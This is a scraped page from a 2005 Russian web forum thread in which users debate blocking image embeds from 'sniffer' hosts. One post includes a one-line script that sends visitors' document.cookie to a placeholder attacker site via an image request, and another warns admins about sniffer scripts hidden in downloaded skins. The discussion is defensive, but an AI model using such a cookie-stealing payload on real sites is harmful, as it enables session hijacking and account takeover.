Strict Standards: Resource ID#18 used as offset, casting to integer (18) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#24 used as offset, casting to integer (24) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#26 used as offset, casting to integer (26) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#27 used as offset, casting to integer (27) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Запрет вставки картинок с определенных хостов [2]
ТвойWeb ТвойWeb
Качественный Европейский хостинг
Форум для чайников
 Чат на форуме      Помощь      Поиск      Пользователи


 Страниц (2): « 1 [2] 

> Описание: Вопрос о безопасности
Cyber-Cat
Отправлено: 26 Июня, 2005 - 05:56:56
Post Id



Advanced Member


Покинул форум
Сообщений всего: 434
Дата рег-ции: Март 2005  
Откуда: From CyberLand

Карма 0




Ray Wen
ну и в какую папку ты будешь записывать .htaccess ?
давай проведем эксперемент.
запрещай на своем форуме вставку картинки с адреса http://antichat.ru, а я попробую ее вставить...

Ray Wen пишет:
и тебе придется вносить еще домен, а затем еще и еще пока не надоест...

Меня это не смущает. Кто говорит что список будет маленький?
Он будет содержать сотни доменов Улыбка
 
 Top
SviMik Супермодератор
Отправлено: 26 Июня, 2005 - 06:05:06
Post Id



Где-то там...


Покинул форум
Сообщений всего: 3538
Дата рег-ции: Окт. 2004  
Откуда: Tallinn, Estonia

Карма 4




Cyber-Cat пишет:
Меня это не смущает. Кто говорит что список будет маленький?
Он будет содержать сотни доменов

И интересно, а что если на этих доменах нормальные картинки будут, юзер ведь не сможет вставить. Ты об этом подумал?
Ray Wen пишет:
Порно... ты конечно извини, но я не видел ни на одном форуме размещенные порнокартинки...

Вот именно.
 
 Top
nokia6230
Отправлено: 26 Июня, 2005 - 06:23:12
Post Id



Super Member


Покинул форум
Сообщений всего: 522
Дата рег-ции: Февр. 2005  
Откуда: Germany

Карма 0




Ray Wen пишет:
Ну кроме ip я даже не знаю что может пригодится... и то, выключился, включился и у тебя уже новый ip...


А вот это батенька ты не прав...
С такими снифирами можно реально заполучить куки зашедшего на адресс всего лишь одного ресунка... А это не есть гуд.
Вот пример
CODE:
<script>img = new Image(); img.src = "http://твойсайт/cgi-bin/пример.jpg?"+document.cookie;</script>


Но так как форум от таких строк просто запрещен, то конечно же можно узнать только мелочные данные.
 
 Top
nokia6230
Отправлено: 26 Июня, 2005 - 06:46:29
Post Id



Super Member


Покинул форум
Сообщений всего: 522
Дата рег-ции: Февр. 2005  
Откуда: Germany

Карма 0




Cyber-Cat
Спасибо, что поднял эту тему.
Хочу предупредить всех, чтобы были осторожны при скачивании каких либо модов от посторонних людей для скинов и так далее. Так как кто-то может нарочно всунуть туда скрипт со снифиром, чтобы заполучить ваши Куки! Если вы что-нибудь такое качаете, то проверяйте внутренности этого файла. Было бы не приятно конечно же, если бы этот человек заполучил доступ к вашему форуму или порталу…
 
 Top
Cyber-Cat
Отправлено: 26 Июня, 2005 - 07:21:54
Post Id



Advanced Member


Покинул форум
Сообщений всего: 434
Дата рег-ции: Март 2005  
Откуда: From CyberLand

Карма 0




SviMik пишет:
И интересно, а что если на этих доменах нормальные картинки будут

Вряд ли найдется хоть одна нормальная картинка на _http://www.censored.net/ или _http://www.censored.com/
nokia6230 пишет:
Спасибо, что поднял эту тему.

Спасибо что понял суть и важность темы Подмигивание

Ссылки как посмотрите - удалите потом их, а то как то не прилично...
 
 Top
Ray Wen Администратор
Отправлено: 26 Июня, 2005 - 14:04:43
Post Id



Собиратель шишек...


Покинул форум
Сообщений всего: 2602
Дата рег-ции: Янв. 2005  
Откуда: Волгоград

Карма 21




nokia6230
Cyber-Cat
Все дело в том, что если я ооочень сильно захочу получить ваши куки или вообще поместить снифер, то мне достаточно пойти и создать домен на бесплатном сервере... эта процедура займет не больш получаса, загрузить туда скрипт и сунуть ссылку... Что дальше? Вы вносите этот адрес в черный список, но за это время открывается еще один домен с этим скриптом... Что дальше? Я попрошу проделывать такую процедуру еще двух-трех человек... через неделю у вас в списке будет около полутысячи доменов.... если конечно не забадаетесь и форум будет тормозит уже от проверок каждой картинки... ИМХО, это не лекарство!
 
 Top
Ray Wen Администратор
Отправлено: 26 Июня, 2005 - 14:05:42
Post Id



Собиратель шишек...


Покинул форум
Сообщений всего: 2602
Дата рег-ции: Янв. 2005  
Откуда: Волгоград

Карма 21




В таком случае лучше банить меня... искать Прокси куда сложнее чем создавать домены...
 
 Top
Cyber-Cat
Отправлено: 26 Июня, 2005 - 14:15:53
Post Id



Advanced Member


Покинул форум
Сообщений всего: 434
Дата рег-ции: Март 2005  
Откуда: From CyberLand

Карма 0




Одно дело создавать домены - это единичные случае...
А другое дело Сниффер-Сервисы. Которые я перечислил в первом посте, т.е. которые уже созданны для МАСС и ими пользуются очень много народу...
Это можно сравнить в массовой почтой... Т.е. ты можешь для почты свой собственный домен зарегить, а можешь пойти на mail.ru и открыть себе ящик. Вот и все сравнение Подмигивание
 
 Top
Страниц (2): « 1 [2]
Сейчас эту тему просматривают: 4 (гостей: 4, зарегистрированных: 0, скрытых: 0)
« ExBB - лучший форум на файлах »


Все гости форума могут просматривать этот раздел.
Только администраторы и модераторы могут создавать новые темы в этом разделе.
Только администраторы и модераторы могут отвечать на сообщения в этом разделе.



Форум на AlfaSpace.NET


Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®

[Script Execution time: 0.2023]     [ Gzipped ]



Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33